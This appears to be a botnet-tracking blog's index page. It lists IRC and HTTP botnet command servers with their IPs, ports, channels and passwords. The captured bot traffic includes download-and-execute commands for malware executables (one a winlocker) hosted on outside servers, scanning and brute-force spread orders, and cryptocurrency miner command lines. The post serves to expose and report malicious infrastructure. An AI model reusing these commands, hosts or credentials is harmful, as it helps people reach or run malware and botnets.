HF Elite Coding Team

Uncategorized

Guys in the irc logs are the Elite of underground coding and i m not trolling is for real lol Pig in the logs is me 100% sure lol Have fun reading and try to be like them elite coders lol [16:46] <@bake> http://pastebin.com/WNmV0e5w [16:46] <@bake> http://pastebin.com/qZJ5v5M4 ...:::::::... ...:::::::... .:::::::::::::::::. .::::::::::::::::::. .::::::::::::::::::::::::::::::::::::::::::::. .:::::::::::::::::::'.-=.-~, ':::::::::::::::::::. .:::::::::::::::::::'Read more...

srv5.su (snk asper mod irc botnet hosted by softronics.ch)

Uncategorized

Resolved srv5.su to 94.242.198.64 Server:  srv5.su Port:  5050 Channel:  #ok #ok :.j #spr .j #lock .j #spam #ok :.d p /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/114/105/119/81/50/105/98/117/ Downloads hxxp://94.242.198.64/4/smart.exe Channel:  #spr #spr :.d x /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/111/122/100/11/121/116/127/ Downloads hxxp://94.242.198.64/4/spra.exe Channel:  #lock #lock :.d l /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/96/112/107/110/11/121/116/127/ Downloads hxxp://94.242.198.64/4/lock.exe (winlocker) Channel:  #spam #spam :.s.a /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/111/119/109/102/78/50/105/98/117/ /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/57/48/ 49 meeisodf Alternate domain:  srv50.su Hosting infos: http://whois.domaintools.com/94.242.198.64

guard4you.info (Betabot http botnet hosted by ecatel.net)

Uncategorized

Resolved guard4you.info to 80.82.66.26 Server:  guard4you.info Gate file:  /customer/order.php Alternate domains:  nexusguardian.info vote4us.info meet2n8.info This is the same idiot as this previous betabot. After three of the free domains he used were suspended due to reports (lol), he decided try again with paid domains. He’s upgraded to four .info domains registered at namecheap, probably allRead more...

31.31.77.195(lightaidra Router Botnet hosted in Czech Republic Hluboka Nad Vltavou Wedos Internet A.s.)

Uncategorized

This bot infects routers Credits to x00 31.31.77.195:5060 Current Local Users: 2528 Max: 2534 Current Global Users: 2528 Max: 2534 Now talking in #sc4n Topic: .sc4n->random->b root admin Topic: Set by [infected (unknown address)] at (Mon May 06 02:31:20 2013) #sc4n x00 @Albert-Wesker @infected 400 linux bots   http://ircqk.nixhosting.org/conf/mel   x00@x00 /tmp $ file melRead more...

irc.antisecbrteam.tk(Dbot hosted in Brazil Sao Paulo Royalfit Comercio De Artigos Esportivos Ltda)

Uncategorized

Resolved : [irc.antisecbrteam.tk] To [201.54.16.10] Server: 201.54.16.10:6667 Server Password: Username: zbotmhz Nickname: L2-3891 Channel: #SpkB2 (Password: SpkDbot762) Channeltopic: Now talking in #SpkB2 Topic On: [ #SpkB2 ] [ .scan 75 1 177.x.x.x 2 1 177.x.x.x ] Topic By: [ xHide ]  around 110 Dbots used for vnc brute and spread JOIN #SpkB0 SpkBot762 Now talkingRead more...

e.balkrev.com(ngrBot hosted in China Changsha Chinanet Hunan Province Network)

Uncategorized

Resolved : [e.balkrev.com] To [124.232.150.214] Resolved : [e.balkrev.com] To [60.172.229.40] Resolved : [e.balkrev.com] To [124.232.163.154] Resolved : [e.balkrev.com] To [124.232.163.150] Resolved : [e.balkrev.com] To [124.232.163.119] TCP Traffic: e.balkrev.com:6510 PASS smart Data received: :Fax!Max@hub.us.com ppppmsg n[US{XPa{jikgbsd!jikgbsd@64.31.35.159 JOIN :#dpi [US{XPa{jikgbsd3a2f #dpi :!dl hxxp://146.185.246.160/dqw7.exe !dl hxxp://146.185.246.160/ups.exe !dl hxxp://146.185.246.160/43n.exe !mdns hxxp://salsayvariando.com/av.txt n[US{XPa{jikgbsd!jikgbsd@64.31. JOIN :#mss n[US{XPa{jikgbsd @ #mss  so channelsRead more...

were.hacked.jp(irc botnet hosted in France Roubaix Ovh Systems)

Uncategorized

Thanks to anonymous guy in this post for the sample Resolved : [were.hacked.jp] To [176.31.123.56] Server: 176.31.123.56:8782Server Password:Username: __x00Nickname: {x00-00-DEU-XP-DELL-9640}Channel: ###x00### (Password: )Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x sample here hosting infos: http://whois.domaintools.com/176.31.123.56

208.89.209.54 (Irc botnet hosted by virpus.com)

Uncategorized

Server:  208.89.209.54 Port:  6667 Current global users 77, max 695 Channels: #goon            3        #aryan           39       #OFFLINE#flood           1        ##yBz##          15       ##Offline##      19    Aryan bots: Channel:  #aryan Topic for #aryan is: #OFFLINE Topic for #aryan set by formality at Sun May 05 16:23:03 2013 Linux bots: Channel:  ##Offline## Channel:  ##yBz## Hosting infos:  http://whois.domaintools.com/208.89.209.54

betabros.in (Several http botnets hosted by hostkey.ru)

Uncategorized

Resolved betabros.in to 146.0.78.4 Server:  betabros.in Gate file:  /beta/order.php The owner should keep a closer eye on the fake forum he setup for cover. 1071 pages of pharmacy spam and counting. Hosting infos: http://whois.domaintools.com/146.0.78.4 EDIT: Bitcoin and litecoin mining. macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p xRead more...